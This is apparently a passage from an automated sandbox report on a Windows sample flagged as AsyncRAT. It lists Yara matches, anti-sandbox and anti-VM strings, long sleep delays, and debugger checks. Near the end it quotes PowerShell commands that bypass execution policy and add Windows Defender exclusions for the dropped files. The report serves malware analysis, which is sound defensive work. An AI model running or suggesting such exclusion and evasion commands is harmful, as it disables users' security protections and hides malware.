                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: All function.cmd, 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Task Manager.exe, 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: SBIEDLL.DLL9AUJ4DGGKLF9MMSEGCIIH9SOMMOHL9MTZTVFW6HQFYGY1R9WWC6GKEOM2R9VUUGG3JHCP1TDWLBEIDRPUDTB8RI9EVZGH4CK47SVFDWPBETDSSLCPLVA90WDHOGC8UWEMFQ3KGP8XYCQKYPAB99JQLIRT3HLIYKB2PHCLCGN48L9NG9LK8ZK0H6BRCOAV5IREHFAGTAXYJB9V9HQELNLDRDGMKYY6ZZ4QXFV02DJ9OCQR4YUGA6Q6TXVMGMHXJUKNWSSK9IDH9Y2CXSDRSASGKY5DJBSRDAWZG9XZN5GTKG8SBQFD687VNT6JSYADPL90DMZVWBFDAB3HDHP7QEFGLAY4Y3D9RRDP3G7B0Q9ISVRIY6V2IPZ7HHAR93BHT967MANEW7F42SWVAVM0SUJM0INFO
                        Source: dLRcE11Dkl.exe, 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: SBIEDLL.DLL15QACTVD4DKT05YV7OTIVCIVV1K35SANJVPJOQRQIRGKSOY0WQ1KKYDM8SK4RVB8WOW7UROITUO1KUWHGNKZ4UEAFJPWTZ609TFF1QLLYWMT2SMJ2JGTZL6U4MEWY1ILTP1WQPCCLKULAPQWFCHHHE1LEMMCQWNZVV46Q0CVTCNMAHU1QH6P2WXHEHFWBHH8YDDGKQL91LVLIT8CUVFN3G2TQ4NXZP8WH1HRTJZ4J1GYTMENCQQRHRZATG1MZV1TZAEEFYEAL4GXY1P0TTZ1BQIQIOPH4DZFAQWLDH6ANQCX185RVKAQDWSKVCPGQGAPYNE1E11ZJHRF37SEHWDZIQ7RXCO5RGINFO
                        Source: All function.exe, 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, BLACKGODDOM V.2 GOD BY LA.exe, 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, BLACKGODDOM V.2 GOD BY LA.exe.5.drBinary or memory string: SBIEDLL.DLLINFO
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeMemory allocated: 8E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeMemory allocated: 1A7F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdMemory allocated: 1AE90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1ADF0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeMemory allocated: B00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeMemory allocated: 1A5F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeMemory allocated: 12A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeMemory allocated: 1ADF0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeMemory allocated: 1450000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeMemory allocated: 1AFF0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3536
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6181
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5966
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3718
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7297
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2244
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6508
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1456
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6186
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1713
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6960
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1981
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5777
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1785
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exe TID: 1372Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmd TID: 2348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exe TID: 3260Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4044Thread sleep time: -14757395258967632s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984Thread sleep time: -12912720851596678s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep count: 7297 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep count: 2244 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012Thread sleep count: 6508 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132Thread sleep count: 1456 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4616Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4560Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep count: 6960 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4596Thread sleep count: 1981 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2012Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 5777 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4144Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784Thread sleep count: 1785 > 30
                        Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: BLACKGODDOM V.2 GOD BY LA.exe.5.drBinary or memory string: vmware
                        Source: All function.exe, 00000005.00000002.2170899251.0000000001175000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
                        Source: All function.exe, 00000005.00000002.2173442106.000000001B82A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\.
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 208.95.112.1 80Jump to behavior
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'
